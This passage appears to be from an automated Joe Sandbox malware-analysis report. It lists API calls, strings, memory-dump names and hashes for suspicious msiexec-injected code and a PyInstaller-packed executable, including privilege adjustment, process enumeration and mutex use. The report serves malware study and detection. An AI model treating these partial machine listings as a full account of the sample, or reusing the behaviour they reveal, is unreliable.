                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 943468954-4119554291
                                                                                                                                                                                                                          • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction ID: 867e4d0523d54abd6983510249531e6df935490b230c31b96c4c8f5087afbdfa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9111F22638AC795DB64AB25F855BAAA762FFC4F80F815031DA4E43A29DE3CD405CB10

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: 79ef0ba9a1ad28870e206111c547275ad5d10005f4d8d584ab38fbeb52480caf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21E932A3CAC681E770AB11F85976AA7A1FFC4F54F814235C59E425A8DF3DE845CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: GetCurrentProcess.KERNEL32 ref: 00007FF775AE414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: OpenProcessToken.ADVAPI32 ref: 00007FF775AE415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF775AE4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF775AE41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: CloseHandle.KERNEL32 ref: 00007FF775AE41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: OpenProcess.KERNEL32 ref: 00007FF775AE41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: CloseHandle.KERNEL32 ref: 00007FF775AE4249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF775AE3037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF775AE304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseHandleHeapOpenToken$AdjustCreateCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3235591951-2286007224

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                          • API String ID: 514040917-585287483
                                                                                                                                                                                                                          • Opcode ID: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
                                                                                                                                                                                                                          • Instruction ID: ce4b8f7df4f6f8621b1c120936bdac7f041be9b197732ae72ec19b3cc8f6e948
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F19F61B0C6C291FB9AFB21D6552F963E1AF98780F844032DA1DC36D6EF2DE55AC301

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                          • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction ID: 69ea1258de8fc715cee994865935ac02d31da5275dc69634fb2ef91effb7241e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0C1C132B2CA4586EB51FFA8C5902AC37A1FB59B98B015225DF1E977E5DF38E452C300

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27A1B
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27A9E
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27ABD
                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27ACB
                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27ADC
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27AE5
                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                          • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                          • Instruction ID: 231f5f990c2747ca0ca421a5b9cad106b83facad08287ab100b52cf27bfd64b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC41A221A1C9C291EBB2BB64E4445F963E0FBA4764F400632D99DC36E5DF3DD64B8B00
                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                          • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction ID: 8084565eab56df56823934c87426674299e02a15cbe342ca9b576c64752de490
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0C872A1C68186F7F1BF60B4483A673D0BB84328F440335D96D436D4CF3CD45A8A04
Memory Dump Source
• Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                                                                                                          • Opcode ID: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                          • Instruction ID: 92782482b31082df342b65508bdadee5e477685243cc76919744eab178cc1caa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E029121B1DA8B41FBD7BB26A5152B926C0BF51B90F484635DD6EC7BD2DE3CA4438302

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock$Message
                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 677216364-3497178890
                                                                                                                                                                                                                          • Opcode ID: a1cc3dfbf880b2008027c75c4616b01fcb92313a166ef75d694093243fe494ea
                                                                                                                                                                                                                          • Instruction ID: 3b6ab993f6dffb2c468912170d2ec60f7662f00a4ea3d6d648ff767d9f0be917
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1cc3dfbf880b2008027c75c4616b01fcb92313a166ef75d694093243fe494ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D271AC31A1C6C685EBA2FB64E5502F923E0FB58784F444131E98DC77DAEF2EE5468B04

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                          • Opcode ID: adbc31a2fe2fde7fb3735bf1b18c6ca33e7db29dbdacf29e2c2b8f7993e137ca
                                                                                                                                                                                                                          • Instruction ID: 8ee70d0e2dae07c0423f845617d93289573fbec97590db296570b064e35155df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adbc31a2fe2fde7fb3735bf1b18c6ca33e7db29dbdacf29e2c2b8f7993e137ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65518B61B1C68392EB92BB55A9101F923E0BF94B94F444131ED0D87AD6EF3DE5478308

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                          • API String ID: 2895956056-699529898
                                                                                                                                                                                                                          • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                          • Instruction ID: 57b67ccf67a1b19d9195e389db8599db1cbdb497864a9edabc63cde0a05064e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89413D31A1CB8681DB61BB64E4452AA73E1FB94360F500335E6AD83BD5DF7CD0468B01

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
